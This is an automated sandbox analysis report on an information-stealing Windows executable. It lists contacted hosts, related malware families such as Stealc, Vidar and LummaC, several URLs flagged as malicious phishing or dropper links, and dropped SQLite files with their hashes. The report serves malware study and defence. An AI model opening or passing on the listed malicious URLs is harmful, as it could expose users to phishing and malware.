172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.198.7.173	unknown	United States	20940	AKAMAI-ASN1EU	false
13.107.246.57	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.198.7.174	unknown	United States	20940	AKAMAI-ASN1EU	false
172.217.16.129	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
23.55.178.204	unknown	United States	2914	NTT-COMMUNICATIONS-2914US	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
18.245.124.39	unknown	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547581
Start date and time:	2024-11-02 17:55:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DbMBWMxoNv.exe renamed because original name is a hash value
Original Sample Name:	f4f514d2d0e346e0e6989aeba521f777.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@74/307@26/27
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 86 Number of non-executed functions: 209
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.184.206, 142.250.74.195, 64.233.166.84, 34.104.35.123, 2.19.126.137, 216.58.206.67, 142.250.186.170, 142.250.185.202, 142.250.185.170, 142.250.74.202, 142.250.185.106, 142.250.185.138, 216.58.212.170, 142.250.181.234, 142.250.184.202, 216.58.206.74, 216.58.206.42, 142.250.184.234, 142.250.185.234, 142.250.185.74, 142.250.186.42, 142.250.186.74, 204.79.197.203, 142.250.181.238, 13.107.6.158, 13.107.42.16, 204.79.197.239, 13.107.21.239, 2.19.126.145, 2.19.126.152, 48.209.180.244, 2.23.209.25, 2.23.209.17, 2.23.209.19, 2.23.209.23, 2.23.209.20, 2.23.209.18, 2.23.209.26, 2.23.209.16, 2.23.209.21, 2.18.64.203, 2.18.64.218, 2.23.209.177, 2.23.209.148, 2.23.209.130, 2.23.209.161, 2.23.209.182, 2.23.209.193, 2.23.209.176, 2.23.209.133, 2.23.209.187, 2.23.209.179, 2.23.209.185, 2.23.209.140, 2.23.209.189, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.23.209.149, 2.23.209.150, 51.137.3.145, 20.189.173.21, 93.184.221.240, 142.250.113.94, 142.250.114.94, 142.250.115.94
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, prod-agic-ne-6.northeurope.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, prod-agic-we-2.westeurope.cloudapp.azure.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, time.windows.co
Execution Graph export aborted for target RoamingEBFBKKJECA.exe, PID 7872 because it is empty
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: DbMBWMxoNv.exe

Simulations

Behavior and APIs

Time	Type	Description
14:52:33	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
20.125.209.212	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
13.91.222.61	https://www.google.md/url?url=https://demeropkdfzdbi&uxzs=zemleptc&icmeyuc=zn0&ywprgz=icmeyuc&uxzs=zemleptc&ywprgz=icmeyuc&fzdbi=demeropkd&znzn=ywprgzuxzs&q=amp%2Fdecentafrica.com%2Flok%2F1160851136%2FZHVzdGluLmZpY2NvQHZvc3Nsb2guY29t	Get hash	malicious	Unknown	Browse
162.159.61.3	SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNOWh47xHSpNswH5B20hFc1rkwm1HkocouB6puE-2FnM91Ea9xIyldie1eyHQvDQGF6-2F1OUGSCOg8K-2Fk8REDXGncryLNWAkNll9tI4svh29XngoJuJcvPHIwWw07juA1Lr687mlf_LZJN6rqeZVHTY7vi7TysfnSOWUsKUPL2t2FWuf1mHJZyRrnfnXk5in-2FtsLaVkEL4z-2F5H1v5rdZCMtKV4-2B7XswPaXSOX44YEil-2BgQ6f1-2BLxpcwnoVslshbeFD8-2FSkDYUL5gsTS7cnhi8iHs4T9b6wzPIbVlUAEwQAwoGeUFJH5x3RAGtspzpDyRWDwHNrMMOluLHeocJQAj7iS1dnS-2B-2Fhpf21Fjpr9lUosnkGJYIkfG0KNsjglBmf2yQvwZsg0Wp706kciqJgB5pqtemV1qFgZLIL2K-2BsyRLGqv3bbeqv6LWX-2Fbn97e4q8h4LdJzfXKTxRJD2tMgj2k7Ls1BdPjLturPdeJvpG2db-2FhwENpXetZR7k21gPz6in5zk7zhcmgIkZssf1WUkdDcjfwIeY2HuQe6EHwacpAnjlFSG7cGBDYbRKnbjWz72QvhesvDQrxGZA-2F-2FwuD5CryGFeRAazVMLU-2FTUgYuXTJzCzL6qav9lYxCC-2Bwx97sSjci4FffUtDhPcIZfKCP-2Ff9rufbc-2FOdTD6VLIHU5lNW4k8Nb-2FWedSu8kS9RXhRxjWAbV4qYK-2F68HLgFHbzOrm6M-2FG6a-2BnVs9TkK9ei8xVDo6cAhkQYCxDYOCBJJC-2BfLWulZgQ85hdg59312Kv6zX2g11nE5GRn-2B6U-2B2tuv67vEmY8CUatMt7UrQHEhVlrPnXi1EamUHW4AGpMQfKBj0GXRdJxG0fD3Zx-2FiIXcDEoi3GhoWLQTKZU-2FWlBKJiyqDLjDXS6qRg1X-2Fsd3R5k7fswdpYLTizSHt12T6-2Bo0IoKg0cyJsPKBfoK9Uleu7f9wgtdH4RtvaMbk9-2Buqhl6zW9NHZET-2BbGJHqyqlBeTSBtTZM6ltHEDZrojb0Lhszq-2BKoSCsuyjzgKAFmmWSRMGxwsXoHHuV8LoFEZjuiOSkTWEP-2FvQ0ZaWfqnp81VXTEktfVY9Xmx-2FaHq5NRH3vqpZc6LNkkSHnpJBPIYA83Mw-3D-3D	Get hash	malicious	Unknown	Browse
	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3D	Get hash	malicious	Unknown	Browse
23.221.22.205	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse
23.221.22.205	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNOWh47xHSpNswH5B20hFc1rkwm1HkocouB6puE-2FnM91Ea9xIyldie1eyHQvDQGF6-2F1OUGSCOg8K-2Fk8REDXGncryLNWAkNll9tI4svh29XngoJuJcvPHIwWw07juA1Lr687mlf_LZJN6rqeZVHTY7vi7TysfnSOWUsKUPL2t2FWuf1mHJZyRrnfnXk5in-2FtsLaVkEL4z-2F5H1v5rdZCMtKV4-2B7XswPaXSOX44YEil-2BgQ6f1-2BLxpcwnoVslshbeFD8-2FSkDYUL5gsTS7cnhi8iHs4T9b6wzPIbVlUAEwQAwoGeUFJH5x3RAGtspzpDyRWDwHNrMMOluLHeocJQAj7iS1dnS-2B-2Fhpf21Fjpr9lUosnkGJYIkfG0KNsjglBmf2yQvwZsg0Wp706kciqJgB5pqtemV1qFgZLIL2K-2BsyRLGqv3bbeqv6LWX-2Fbn97e4q8h4LdJzfXKTxRJD2tMgj2k7Ls1BdPjLturPdeJvpG2db-2FhwENpXetZR7k21gPz6in5zk7zhcmgIkZssf1WUkdDcjfwIeY2HuQe6EHwacpAnjlFSG7cGBDYbRKnbjWz72QvhesvDQrxGZA-2F-2FwuD5CryGFeRAazVMLU-2FTUgYuXTJzCzL6qav9lYxCC-2Bwx97sSjci4FffUtDhPcIZfKCP-2Ff9rufbc-2FOdTD6VLIHU5lNW4k8Nb-2FWedSu8kS9RXhRxjWAbV4qYK-2F68HLgFHbzOrm6M-2FG6a-2BnVs9TkK9ei8xVDo6cAhkQYCxDYOCBJJC-2BfLWulZgQ85hdg59312Kv6zX2g11nE5GRn-2B6U-2B2tuv67vEmY8CUatMt7UrQHEhVlrPnXi1EamUHW4AGpMQfKBj0GXRdJxG0fD3Zx-2FiIXcDEoi3GhoWLQTKZU-2FWlBKJiyqDLjDXS6qRg1X-2Fsd3R5k7fswdpYLTizSHt12T6-2Bo0IoKg0cyJsPKBfoK9Uleu7f9wgtdH4RtvaMbk9-2Buqhl6zW9NHZET-2BbGJHqyqlBeTSBtTZM6ltHEDZrojb0Lhszq-2BKoSCsuyjzgKAFmmWSRMGxwsXoHHuV8LoFEZjuiOSkTWEP-2FvQ0ZaWfqnp81VXTEktfVY9Xmx-2FaHq5NRH3vqpZc6LNkkSHnpJBPIYA83Mw-3D-3D	Get hash	malicious	Unknown	Browse	162.159.61.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
sb.scorecardresearch.com	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	18.154.84.35
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.27
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.38
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse	18.65.39.70
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	108.139.47.92
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.32
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.239.83.58
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.239.83.126
	ae713827-e32c-f66b-fbdb-5405db450711.eml	Get hash	malicious	Unknown	Browse	18.244.18.122
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.221.22.212
	meow.arm7.elf	Get hash	malicious	Unknown	Browse	172.233.1.42
	hiss.arm.elf	Get hash	malicious	Unknown	Browse	172.235.29.234
	debug.dbg.elf	Get hash	malicious	Gafgyt, Mirai	Browse	23.194.118.64
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.198.7.179
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	23.221.22.196
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse	23.198.7.179
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse	23.199.48.23
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.221.22.209
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:595729f4-6ee1-464c-a534-c9dd79612c8d	Get hash	malicious	HTMLPhisher	Browse	2.16.238.6
MICROSOFT-CORP-MSN-AS-BLOCKUS	ap4pkLeaVp.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe	Get hash	malicious	Unknown	Browse	52.123.243.92
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	13.107.253.45
	mcron-vip-1.elf	Get hash	malicious	Unknown	Browse	20.56.16.3
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar	Browse	52.168.117.173
	spc.elf	Get hash	malicious	Mirai	Browse	21.244.4.50
	m68k.elf	Get hash	malicious	Unknown	Browse	20.127.23.199
	mpsl.elf	Get hash	malicious	Mirai	Browse	52.245.21.241
	arm6.elf	Get hash	malicious	Unknown	Browse	21.9.102.78
	ppc.elf	Get hash	malicious	Mirai	Browse	52.121.72.154
CLOUDFLARENETUS	hB5udQ0swC.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	https://mclimber.org/fishar%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.67.153.172
	7rfw2HqJjJ.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Win64.MalwareX-gen.26402.21423.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://parrots-run-fjh.craft.me/kKsdDph47M82kH	Get hash	malicious	Unknown	Browse	104.16.40.28
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	m66Mwr3koh.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	m66Mwr3koh.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
MICROSOFT-CORP-MSN-AS-BLOCKUS	ap4pkLeaVp.exe	Get hash	malicious	Unknown	Browse	13.107.246.60
	SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exe	Get hash	malicious	Unknown	Browse	52.123.243.92
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	13.107.253.45
	mcron-vip-1.elf	Get hash	malicious	Unknown	Browse	20.56.16.3
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar	Browse	52.168.117.173
	spc.elf	Get hash	malicious	Mirai	Browse	21.244.4.50
	m68k.elf	Get hash	malicious	Unknown	Browse	20.127.23.199
	mpsl.elf	Get hash	malicious	Mirai	Browse	52.245.21.241
	arm6.elf	Get hash	malicious	Unknown	Browse	21.9.102.78
	ppc.elf	Get hash	malicious	Mirai	Browse	52.121.72.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://mclimber.org/fishar%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	https://parrots-run-fjh.craft.me/kKsdDph47M82kH	Get hash	malicious	Unknown	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	lum.ps1	Get hash	malicious	LummaC	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	https://all-filehub.oss-ap-southeast-1.aliyuncs.com/2nd.zip	Get hash	malicious	LummaC	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	American.ps1	Get hash	malicious	AsyncRAT	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	Reservation Detail Booking.com ID.bat	Get hash	malicious	AsyncRAT	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	ap4pkLeaVp.exe	Get hash	malicious	Unknown	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	Reservation Detail Booking.com ID4336.vbs	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	4.175.87.197 20.190.159.4 184.28.90.27 13.107.246.45

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Socks5Systemz, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	czxw4iVMHJ.exe	Get hash	malicious	Stealc, Vidar	Browse
	JHPvqMzKbz.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\chrome.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CBAFCAKEHDHDHIDHDGDH

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CFCBFBGDBKJKECAAKKFH

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGCGDBGCAAEBFIECGHDG

Download File

Process:	C:\Users\user\Desktop\DbMBWMxoNv.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
